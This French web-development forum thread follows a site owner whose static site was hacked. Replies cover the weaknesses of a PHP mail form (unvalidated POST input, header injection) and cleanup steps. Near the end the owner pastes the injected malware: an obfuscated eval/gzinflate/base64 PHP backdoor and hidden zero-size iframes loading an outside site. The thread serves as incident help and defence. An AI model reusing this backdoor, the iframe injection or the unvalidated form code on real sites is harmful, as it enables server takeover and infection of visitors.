[PHP 5.0] Présence de faille PHP?

[Mandarine]

Sur mon site depuis la page index.html j'appelle en post le formulaire suivant:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
 
//Redirection vers la page d'accueil
header('Location: index.html');
 
 
// On recupère les valeurs du formulaire
$nom=$_POST['nom'];
$prenom=$_POST['prenom'];
$societe=$_POST['societe'];
$adresse=$_POST['adresse'];
$mail=$_POST['mail'];
$telephone=$_POST['telephone'];
 
$message="Nom: ".$nom."\n\n"."Prénom: ".$prenom."\n\n"."Société: ".$societe."\n\n"."Adresse: ".$adresse."\n\n"."Téléphone: ".$telephone."\n\n";
 
mail("moi@gmail.com","Formulaire du site",$message,"From: <a href="mailto:test@gmail.com">test@gmail.com</a>"); 
 
?>

Pensez vous que cela ne soit pas sécurisé ?

Car je me suis fait hacké mon site (on a ajouté du code dans le fichier index.html) et je me demande si cela vient de là ?

Merci.

[gene69]

non ça ne peut pas venir que de ce bout de code. mais vu ce qu'on y lit c'est assez probable que le reste de la sécurité du site soit égale à 0.

[Atomya Rise]

Te faire hacker à partir d'un simple formulaire qui envoie un mail sans faire d’insertion en bdd ou autre ??

Quand tu dis "hacker", que veux tu dire, que c'est-il passé... ?? Plus de précision pour mieux cerner le problème serais apprécié.

Pour info, dans ton code, tu envoies du html dans un header d'email..., ce n'est pas comme ceci que cela s’écrit.

[Mandarine]

Citation:

Envoyé par gene69

non ça ne peut pas venir que de ce bout de code. mais vu ce qu'on y lit c'est assez probable que le reste de la sécurité du site soit égale à 0.

Pourquoi dis tu que c'est mal écrit ? Je ne vois pas ce que j'aurai du changer... ?

Le reste du site n'est qu'en HTML.

Concernant le piratage:
Une balise <iframe> a été inséré en début de mon fichier index.html
Et un fichier: ".php" est apparu sur le serveur.

[Atomya Rise]

Tout d'abord pour l'écriture. Je te laisse lire ce message qui servira ici d'exemple afin que tu constates que nul part on y mets du html....

http://www.developpez.net/forums/d79...der-from-mail/

De plus, dans ton code, tu fais tout par $_POST.. sans même vérifié les saisies... Facile de modifier tout ceci, voici un petit texte très enrichissant :

http://www.phpsecure.info/v2/article...dersInject.php

Mais bon, je doute fort que ton fichier php soit arrivé de ce côté...

Peux-tu nous montrer cette page ? ainsi que l'iframe en question ?

Tu es sur que personne ne possède tes mots de passes ?


Ou alors, il y a de bonne chance que tu es chopé un virus sur ta machine à toi et que ce virus en as profité pour voler tes mots de passe Fillezilla....

[gene69]

quand on écrit

$toto = $_POST['toto'];


c'est se donner bonne conscience ou pour faire de la compatibilité pas cher avec la désactivation des magic_quote. sécurité = -1.

[laurentSc]

Citation:

quand on écrit

$toto = $_POST['toto'];


c'est se donner bonne conscience

Oui, mais on gagne en lisibilité.

[jreaux62]

Citation:

Envoyé par Mandarine

Concernant le piratage:
Une balise <iframe> a été inséré en début de mon fichier index.html
Et un fichier: ".php" est apparu sur le serveur.

Bonjour,

Citation:

- Il est très possible que d'autres fichiers soient aussi infectés.
- Il est possible que ce soit ton espace d'hébergement (via ton FTP), ou le serveur lui-même (plus grave) qui ait été piraté.
- il se peut aussi que ce soit ton PC qui soit contaminé par un virus.

Un article sur le sujet :
Attaques Sites Web par Iframes (et similaires) : Problèmes et Solutions (Gumblar, Martuz, etc.)

-> Quel est ton hébergeur ?
J'ai déjà vu le cas : le serveur complet avait dû être ré-initialisé ...

Citation:

Il faut impérativement :
- changer tes mots de passe de connexion (ftp, bdd, espace client)
- contacter l'hébergeur, et le prévenir,
- NE PAS télécharger de fichiers DEPUIS ton serveur VERS ton PC.
- faire un check-up complet et approfondi de ton PC (-> anti-virus à jour) car il peut être contaminé
- espérer que tu as une sauvegarde "saine" de tes fichier sur ton ordi.

Et pour ton envoi mail :
-> Envoyer un mail en PHP : Créer un formulaire de contact simple
-> fonction mail()

[gene69]

Citation:

Envoyé par laurentSc

Oui, mais on gagne en lisibilité.

non. on crois lire une donnée qui est sécurisée et en fait elle ne l'est pas. on perd une information. On s'est donné bonne conscience, on a presque envie de l'écrire toute crue dans une requete SQL... et on crée une faille par injection sql sans en rendre compte.

[Thes32]

Citation:

Envoyé par Mandarine

Une balise <iframe> a été inséré en début de mon fichier index.html
Et un fichier: ".php" est apparu sur le serveur.

Comme te le dit jreaux62 le problème ne viens pas de PHP, ce sont plutôt tes fichiers qui on été modifier soit par un virus (sur ta machine avant upload ou sur le serveur carrément) soit quelqu'un d'autre à ajouter le bout de code à la mano.

Dans tous les deux cas suit bien les conseils de jreaux62.

[Mandarine]

@jreaux62: j'ai fait toutes les modifications préconisées. Pas de virus sur ma machine, ni de troyen.

J'ai un abonnement mutualisé 1and1. Je les ai prévenu, mais apparemment j'étais la seule victime de cela.

Je n'ai plus l'iframe ni le .php de disponibles Mais de mémoire l'iframe ou le .php contenait une fonction evalf ou un truc du genre.

J'ai fait un backup de mes sources sur le serveur.

Merci pour toutes vos informations !

Vous m'avez bien éclairez sur ce problème et sur le fait que mes sites sont pas sécurisés. Auriez vous un lien simple d'accès pour sécuriser toutes les données post ou get. Du genre

$toto=fonction_secure($_POST['toto']);

Je schématise mais bon c'est l'idée générale.

[jreaux62]

-> Filtrage des données
-> Les filtres PHP : une fonctionnalité importante de sécurité

-> une petite discussion : textarea et faille xss

[Mandarine]

Pour conclure ce topic, j'ai retrouvé les modifications effectuées sur mon serveur.

Pour info:
ajout d'un fichier .php contenant

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
<?eval(gzinflate(base64_decode('fVNtb9owEP4rruUPibQGWmB0CyB1ElUnTRpqYXwoa+T4pbhN7Mx2+rLCf985gQpV1b6cz77n7Oe5OysZkWz283p+g6WlpcC/EdUcHYmy8i/vQ3H8SpTm4lmqQjg0RjiKbpuDVbK55ULSuvDBLanSqySOqnVFNmB6je03dhCsLwuyUZqRTeuCJRvX+q7ZUFc9N5Zs7hvTBpksSRzjlDSUmNFeaA9M3jFNyRpkFAIiphKaKxvhBMfp0xqYo0jSwgl0NB6jiAQttCgAaQXlAbnLjUGukpGw4k5FB7o/oX1OC1Aue7LK07wQ0UGEyDcKMnB4i31CmAIVGZJCRgsLtx5IilMk2NogfGeKe/v0p+p7fVf0e0NNnew+PuB0u92ywjhxyDjdChAWSJHsenr1a3p1g2eXs+x8Mb/MFnAC7Q2qsTXGqweMjEUlH3yEni2h3y34dHjWzbtnw+FnyU9lT/J8mLNBT/Avg1PG5RDHr2sonYAaL5fL4/Par0GBYtSLr+gbdYqF0hbleIXPGRPOIS60EnyFoQz7zMv5fNY5Sbqo3z1BC03hEmPVX8Hxgaojkl18/zG9Drx3LrQcyqqbrt9gBxmgEVh349dQQDwKczMZhWcmo0675Ia/TEbS2BJR5pXRwGyFUSngTQ5+ZZyHvdDMv1QCDkqYa1VR6zsh6ZhTT1d4MlK6qj3aYQINSApMdrvgBlhu30FdnZcqvPBIizocLKrCUL7HNo/A0tLsNAJwKp6Vjw5qwUwVPugHRfBllbU+jFrSwcmHKL3/0u2cXYSPMcon/0UnGFhNUN3QFRy5uulngne02qum1kJ/3kDhmmZct/8A')));?>

Et dans mes fichiers index, l'iframe ajoutée est la suivante:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe><iframe src='http://www.formerfatkid.net/index.php' width='0' height='0' allowTransparency frameborder='0' scrolling='no'></iframe>

Merci pour toutes vos informations